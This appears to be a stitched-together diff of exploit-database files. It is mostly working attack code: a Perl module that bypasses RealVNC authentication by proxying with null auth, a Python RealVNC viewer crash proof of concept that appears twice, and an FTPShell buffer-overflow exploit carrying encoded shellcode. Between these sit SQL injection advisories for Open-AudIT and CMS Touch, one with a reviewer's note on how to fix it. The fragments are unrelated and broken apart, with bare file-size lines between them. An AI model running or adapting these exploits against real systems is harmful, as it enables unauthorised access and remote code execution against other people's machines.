'AUTOCONNECT' => [1, 'DATA', 'Automatically launch vncviewer', 1],
},
'Refs' =>
[
['URL', 'http://secunia.com/advisories/20107/']
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'RealVNC' ],
],
'Keys' => [ 'realvnc' ],
'DisclosureDate' => 'May 15 2006',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('LHOST'),
LocalPort => $self->GetVar('LPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp');
my $client;
# Did the listener create fail?
if (not defined($server))
{
$self->PrintLine("[-] Failed to create local VNC listener on " . $self->GetVar('SSHDPORT'));
return;
}
if ($self->GetVar('AUTOCONNECT') =~ /^(T|Y|1)/i) {
if (! fork()) {
system("vncviewer 127.0.0.1::".$self->GetVar('LPORT'));
exit(0);
}
}
$self->PrintLine("[*] Waiting for VNC connections to " . $self->GetVar('LHOST') . ":" . $self->GetVar('LPORT') . "...");
while (defined($client = $server->accept()))
{
$self->HandleVNCClient(fd => Msf::Socket::Tcp->new_from_socket($client));
}
return;
}
# Stolen from InjectVNCStage.pm
sub HandleVNCClient
{
my $self = shift;
my ($fd) = @{{@_}}{qw/fd/};
my $rhost;
my $rport;
# Set the remote host information
($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
# Create a connection to the target system
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $self->GetVar('RHOST'),
'PeerPort' => $self->GetVar('RPORT'),
'SSL' => $self->GetVar('SSL')
);
if ($s->IsError) {
$self->PrintLine('[*] Could not connect to the target VNC service: ' . $s->GetError);
$fd->Close;
return;
}
my $res = $s->Recv(-1, 5);
# Hello from server
if ($res !~ /^RFB 003\.008/) {
$self->PrintLine("[*] The remote VNC service is not vulnerable");
$fd->Close;
$s->Close;
return;
}
# Send it to the client
$fd->Send($res);
# Hello from client
$res = $fd->Recv(-1, 5);
if ($res !~ /^RFB /) {
$self->PrintLine("[*] The local VNC client appears to be broken");
$fd->Close;
$s->Close;
return;
}
# Send it to the server
$s->Send($res);
# Read the authentication methods from the server
$res = $s->Recv(-1, 5);
# Tell the client that the server only supports NULL auth
$fd->Send("\x01\x01");
# Start pumping data between the client and server
if (! fork()) {
$self->PrintLine("[*] Proxying data between the connections...");
$self->VNCProxy($s->Socket, $fd->Socket);
exit(0);
}
return;
}
sub VNCProxy {
my $self = shift;
my $srv = shift;
my $cli = shift;
foreach ($srv, $cli) {
$_->blocking(1);
$_->autoflush(1);
}
my $selector = IO::Select->new($srv, $cli);
LOOPER:
while(1) {
my @ready = $selector->can_read;
foreach my $ready (@ready) {
if($ready == $cli) {
my $data;
$cli->recv($data, 8192);
last LOOPER if (! length($data));
last LOOPER if(!$srv || !$srv->connected);
eval { $srv->send($data); };
last LOOPER if $@;
}
elsif($ready == $srv) {
my $data;
$srv->recv($data, 8192);
last LOOPER if(!length($data));
last LOOPER if(!$cli || !$cli->connected);
eval { $cli->send($data); };
last LOOPER if $@;
}
}
}
}
1;
# milw0rm.com [2006-05-15]

55
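--- a/platforms/php/webapps/39150.txt
+++ b/platforms/php/webapps/39150.txt
@@ -0,0 +1,55 @@
+#Exploit Title : Open Audit SQL Injection Vulnerability
+#Exploit Author : Rahul Pratap Singh
+#Date : 2/Jan/2016
+#Home page Link : https://github.com/jonabbey/open-audit
+#Website : 0x62626262.wordpress.com
+#Twitter : @0x62626262
+#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
+1. Description
+"id" field in software_add_license.php is not properly sanitized, that
+leads to SQL Injection Vulnerability.
+"pc" field in delete_system.php, list_viewdef_software_for_system.php and
+system_export.php is not properly sanitized, that leads to SQL Injection
+Vulnerability.
+2. Vulnerable Code:
+software_add_license.php: ( line 12 to 13)
+$sql = "SELECT * from software_register WHERE software_reg_id = '" .
+$_GET["id"] . "'";
+$result = mysql_query($sql, $db);
+delete_system.php: ( line 5 to 10)
+if (isset($_GET['pc'])) {
+$link = mysql_connect($mysql_server, $mysql_user, $mysql_password) or
+die("Could not connect");
+mysql_select_db("$mysql_database") or die("Could not select database");
+$query = "select system_name from system where system_uuid='" .
+$_GET['pc'] . "'";
+$result = mysql_query($query) or die("Query failed at retrieve system
+name stage.");
+list_viewdef_software_for_system.php: ( line 2 to 3)
+$sql = "SELECT system_os_type FROM system WHERE system_uuid = '" .
+$_REQUEST["pc"] . "'";
+$result = mysql_query($sql, $db);
+system_export.php: ( line 108 to 112)
+if(isset($_REQUEST["pc"]) AND $_REQUEST["pc"]!=""){
+$pc=$_REQUEST["pc"];
+$_GET["pc"]=$_REQUEST["pc"];
+$sql = "SELECT system_uuid, system_timestamp, system_name FROM system
+WHERE system_uuid = '$pc' OR system_name = '$pc' ";
+$result = mysql_query($sql, $db);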
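Review bot: The advisory quotes four places where `$_GET["id"]` / `$_REQUEST["pc"]` are concatenated straight into SQL but states no remediation, so a reader patching Open-AudIT has nothing to act on. A short "3. Fix" note would close that gap, for example for software_add_license.php: `$stmt = $db->prepare("SELECT * FROM software_register WHERE software_reg_id = ?"); $stmt->bind_param("s", $_GET["id"]); $stmt->execute();`, with the same treatment for the `pc` parameter in the other three files. It is worth saying in that note that the `mysql_*` functions used in every snippet are deprecated and cannot bind parameters, so moving `$db` to a mysqli or PDO handle is part of the fix rather than optional, and that system_export.php interpolates `$pc` twice in one statement so both placeholders need binding. Line numbers cited in the advisory appear to refer to the upstream files and are not verifiable from this text alone.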


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/67377/info
CMS Touch is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
Successful exploits could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMS Touch 2.01 is vulnerable; other versions may also be affected.
http://www.example.com/cmstouch/pages.php?Page_ID=[SQL]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/67377/info
CMS Touch is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
Successful exploits could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMS Touch 2.01 is vulnerable; other versions may also be affected.
http://www.example.com/cmstouch/news.php?do=show&News_ID=[SQL]

14
platforms/windows/dos/39180.pl Executable file


24
platforms/windows/dos/39181.py Executable file


14
platforms/windows/dos/39183.py Executable file



@ -1,53 +1,53 @@
#!/usr/bin/env python
# POC: RealVNC 4.1.2 'vncviewer.exe' RFB Protocol Remote Code Execution Vulnerability, BID 30499
#Author: Andres Lopez Luksenberg <polakocai@gmail.com>
#
import socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)
while True:
clientsocket, clientaddres = serversocket.accept()
data = 'RFB 003.008\n'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print data_cli
data = '\x01\x01'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data = '\x00\x00\x00\x00'
clientsocket.sendall(data)
data = '\x02\xd0\x01\x77\x08\x08\x00\x00\x00\x07\x00\x07\x00\x03\x00\x03\x06\x00\x00\x00\x00\x00\x00\x13\x4c\x69\x6e\x75\x78\x56\x4e\x43\x3a\x20\x2f\x64\x65\x76\x2f\x74\x74\x79\x32'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data='\x00\x00\x00\x03\x00\x03\x00\x03\x00\x08\x00\x07'
data = data + '\x00\x00\xff\xff' #bug
data = data + '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe7\xe7\x7e\x3c\x7e\xe7\xe7'
clientsocket.sendall(data)
clientsocket.close()
serversocket.close()
# milw0rm.com [2009-02-02]
#!/usr/bin/env python
# POC: RealVNC 4.1.2 'vncviewer.exe' RFB Protocol Remote Code Execution Vulnerability, BID 30499
#Author: Andres Lopez Luksenberg <polakocai@gmail.com>
#
import socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)
while True:
clientsocket, clientaddres = serversocket.accept()
data = 'RFB 003.008\n'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print data_cli
data = '\x01\x01'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data = '\x00\x00\x00\x00'
clientsocket.sendall(data)
data = '\x02\xd0\x01\x77\x08\x08\x00\x00\x00\x07\x00\x07\x00\x03\x00\x03\x06\x00\x00\x00\x00\x00\x00\x13\x4c\x69\x6e\x75\x78\x56\x4e\x43\x3a\x20\x2f\x64\x65\x76\x2f\x74\x74\x79\x32'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data='\x00\x00\x00\x03\x00\x03\x00\x03\x00\x08\x00\x07'
data = data + '\x00\x00\xff\xff' #bug
data = data + '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe7\xe7\x7e\x3c\x7e\xe7\xe7'
clientsocket.sendall(data)
clientsocket.close()
serversocket.close()
# milw0rm.com [2009-02-02]


@ -0,0 +1,79 @@
# Exploit Title: FTPShell Client 5.24 - Add to Favorites Buffer Overflow
# Google Dork: N/A
# Date: 2015-01-04
# Exploit Author: INSECT.B
# Twitter : @INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# Blog : http://binsect00.tistory.com
# Vendor Homepage: www.ftpshell.com
# Software Link: http://www.ftpshell.com/download.htm
# Version: 5.24
# Tested on: Windows7 Ultimate SP1 K x86
# CVE : N/A
"""
[+] Type : Buffer Overflow
[-] ftpsehll client has a buffer overlow entry point in the [Favorites] - [Add to favorites..] 'Session name' input field
[-] used to add session to favorites list .
[+]Crash : input 'A' x 1500 to Session name field
[-] (4c4.8f8): Access violation - code c0000005 (!!! second chance !!!)
[-] eax=00000000 ebx=00944a0c ecx=00000000 edx=41414141 esi=00000500 edi=0012fe1c
[-] eip=41414141 esp=0012fd54 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
[-] cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
[-] 41414141 ?? ???
"""
import struct
junk = "A"*460
junk2 = "\x90"*248
esp = "\x0B\xD4\xDF\x73" # JMP ESP
#shellcode
#CMD : calc.exe
#encoder : Alpha-mix encoder
#buffer register : esp
sc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x38\x68" +
"\x4b\x32\x33\x30\x75\x50\x63\x30\x65\x30\x6c\x49\x5a\x45" +
"\x65\x61\x39\x50\x35\x34\x4c\x4b\x46\x30\x54\x70\x4e\x6b" +
"\x63\x62\x46\x6c\x6e\x6b\x43\x62\x47\x64\x4c\x4b\x44\x32" +
"\x46\x48\x74\x4f\x4f\x47\x51\x5a\x37\x56\x35\x61\x59\x6f" +
"\x6e\x4c\x45\x6c\x43\x51\x53\x4c\x43\x32\x44\x6c\x65\x70" +
"\x5a\x61\x5a\x6f\x74\x4d\x37\x71\x6a\x67\x4a\x42\x39\x62" +
"\x76\x32\x42\x77\x6c\x4b\x31\x42\x36\x70\x4e\x6b\x33\x7a" +
"\x57\x4c\x6e\x6b\x32\x6c\x66\x71\x42\x58\x78\x63\x53\x78" +
"\x73\x31\x7a\x71\x36\x31\x4e\x6b\x66\x39\x51\x30\x36\x61" +
"\x59\x43\x6e\x6b\x57\x39\x62\x38\x58\x63\x45\x6a\x52\x69" +
"\x6c\x4b\x44\x74\x4e\x6b\x55\x51\x7a\x76\x70\x31\x69\x6f" +
"\x6c\x6c\x6f\x31\x48\x4f\x36\x6d\x65\x51\x7a\x67\x76\x58" +
"\x59\x70\x61\x65\x48\x76\x53\x33\x71\x6d\x4b\x48\x35\x6b" +
"\x61\x6d\x36\x44\x31\x65\x4b\x54\x30\x58\x6e\x6b\x66\x38" +
"\x76\x44\x56\x61\x4e\x33\x51\x76\x6c\x4b\x74\x4c\x72\x6b" +
"\x6e\x6b\x71\x48\x47\x6c\x57\x71\x7a\x73\x4c\x4b\x66\x64" +
"\x6e\x6b\x36\x61\x6e\x30\x4d\x59\x50\x44\x57\x54\x66\x44" +
"\x63\x6b\x71\x4b\x61\x71\x63\x69\x61\x4a\x36\x31\x39\x6f" +
"\x59\x70\x61\x4f\x61\x4f\x52\x7a\x4c\x4b\x64\x52\x5a\x4b" +
"\x6e\x6d\x31\x4d\x32\x4a\x75\x51\x6c\x4d\x4b\x35\x48\x32" +
"\x75\x50\x65\x50\x67\x70\x66\x30\x73\x58\x65\x61\x4c\x4b" +
"\x52\x4f\x6b\x37\x59\x6f\x48\x55\x4d\x6b\x38\x70\x78\x35" +
"\x59\x32\x33\x66\x72\x48\x79\x36\x5a\x35\x6d\x6d\x4d\x4d" +
"\x6b\x4f\x58\x55\x45\x6c\x33\x36\x61\x6c\x76\x6a\x6b\x30" +
"\x6b\x4b\x4d\x30\x54\x35\x45\x55\x4f\x4b\x62\x67\x37\x63" +
"\x70\x72\x70\x6f\x70\x6a\x45\x50\x46\x33\x69\x6f\x49\x45" +
"\x50\x63\x65\x31\x50\x6c\x71\x73\x46\x4e\x42\x45\x70\x78" +
"\x73\x55\x75\x50\x41\x41"
)
payload = junk + esp + sc + junk2
file=open("C:\\shelll","w")
file.write(payload)
file.close()